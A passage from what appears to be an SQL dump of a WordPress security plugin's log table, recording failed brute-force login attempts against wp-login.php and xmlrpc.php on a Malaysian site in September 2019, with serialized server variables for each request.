14:58:31',18255256,19554760,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.228.226'),(24166,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.229.84.90\";s:11:\"REMOTE_PORT\";s:5:\"35460\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@jJB0uvyt9KRYoKL8i2gAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568645924.7329\";s:12:\"REQUEST_TIME\";s:10:\"1568645924\";}}','notice','2019-09-16 14:58:46','2019-09-16 14:58:45',17740208,19232720,'https://bintara.com.my/wp-login.php',1,0,'23.229.84.90'),(24167,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.229.84.90\";s:11:\"REMOTE_PORT\";s:5:\"36420\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@jJx0uvyt9KRYoKL8i2wAAAAM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568645927.7454\";s:12:\"REQUEST_TIME\";s:10:\"1568645927\";}}','notice','2019-09-16 14:58:49','2019-09-16 14:58:48',18256688,19556512,'https://bintara.com.my/xmlrpc.php',1,0,'23.229.84.90'),(24168,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"97.74.228.176\";s:11:\"REMOTE_PORT\";s:5:\"43784\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@lBR0uvyt9KRYoKL8ksgAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568646406.0777\";s:12:\"REQUEST_TIME\";s:10:\"1568646406\";}}','notice','2019-09-16 15:06:47','2019-09-16 15:06:46',17744984,19231832,'https://bintara.com.my/wp-login.php',1,0,'97.74.228.176'),(24169,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"97.74.228.176\";s:11:\"REMOTE_PORT\";s:5:\"43784\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@lBR0uvyt9KRYoKL8ksgAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568646406.0777\";s:12:\"REQUEST_TIME\";s:10:\"1568646406\";}}','notice','2019-09-16 15:06:47','2019-09-16 15:06:46',17906680,19231832,'https://bintara.com.my/wp-login.php',1,0,'97.74.228.176'),(24170,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"97.74.228.176\";s:11:\"REMOTE_PORT\";s:5:\"44235\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@lCB0uvyt9KRYoKL8kswAAABE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568646408.8644\";s:12:\"REQUEST_TIME\";s:10:\"1568646408\";}}','notice','2019-09-16 15:06:50','2019-09-16 15:06:49',18255344,19555072,'https://bintara.com.my/xmlrpc.php',1,0,'97.74.228.176'),(24171,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"42578\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@lwx0uvyt9KRYoKL8lUQAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568646595.5426\";s:12:\"REQUEST_TIME\";s:10:\"1568646595\";}}','notice','2019-09-16 15:09:56','2019-09-16 15:09:55',17737352,19228312,'https://bintara.com.my/wp-login.php',1,0,'23.83.230.2'),(24172,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"43022\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@lxh0uvyt9KRYoKL8lVAAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568646598.2033\";s:12:\"REQUEST_TIME\";s:10:\"1568646598\";}}','notice','2019-09-16 15:09:59','2019-09-16 15:09:58',18257432,19557112,'https://bintara.com.my/xmlrpc.php',1,0,'23.83.230.2'),(24173,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"162.214.20.79\";s:11:\"REMOTE_PORT\";s:5:\"42768\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@o3x0uvyt9KRYoKL8nVAAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568647391.8966\";s:12:\"REQUEST_TIME\";s:10:\"1568647391\";}}','notice','2019-09-16 15:23:13','2019-09-16 15:23:12',17740336,19231280,'https://bintara.com.my/wp-login.php',1,0,'162.214.20.79'),(24174,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"162.214.20.79\";s:11:\"REMOTE_PORT\";s:5:\"43448\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@o4h0uvyt9KRYoKL8nVgAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568647394.7202\";s:12:\"REQUEST_TIME\";s:10:\"1568647394\";}}','notice','2019-09-16 15:23:16','2019-09-16 